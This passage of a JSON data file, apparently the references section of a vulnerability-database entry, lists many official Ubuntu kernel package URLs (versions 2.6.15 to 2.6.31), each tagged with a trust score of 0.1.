        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.68.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-305-ec2_2.6.31-305.13_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.60_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-20.58_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.83_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-lpia_2.6.31-20.58_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.83_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-virtual_2.6.31-20.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.68.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-109.25.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.46_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-212.26.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.46_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-20.58_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-305.13_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.83_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.68_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.68_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.68_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.68_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-server_2.6.31-20.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
